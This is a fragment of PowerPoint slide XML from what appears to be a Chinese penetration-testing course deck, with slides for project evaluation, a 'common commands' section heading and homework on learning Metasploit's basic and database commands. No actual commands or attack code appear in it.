                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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28" name="矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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29" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="10922635" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit的基本命令和数据库相关命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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10" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
